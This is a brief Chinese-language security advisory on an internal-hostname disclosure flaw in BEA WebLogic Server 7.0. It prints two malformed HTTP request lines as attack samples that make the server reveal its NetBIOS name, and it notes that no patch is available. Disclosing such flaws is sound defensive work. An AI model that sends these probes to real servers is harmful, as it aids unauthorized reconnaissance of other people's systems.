涉及程序: BEA WebLogic Server 7.0版 描述: BEA WebLogic Server 存在内部主机名泄露缺陷 详细: BEA WebLogic Server 被喻为全球最受欢迎的Java 应用服务器,能拓展企业应用的极限。BEA Weblogic Server 存在缺陷,攻击者通过发送下列请求能使服务器显示其内部主机名(Windows机器上的NetBIOS名称): GET . HTTP/1.0\\r\\n\\r\\n 在BEA WebLogic Server 7.0版中,利用下列请求能得到同样的效果: BLAH . BLAH\\r\\n\\r\\n 攻击方法: 示例代码1: GET . HTTP/1.0\\r\\n\\r\\n 示例代码2: BLAH . BLAH\\r\\n\\r\\n 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.bea.com/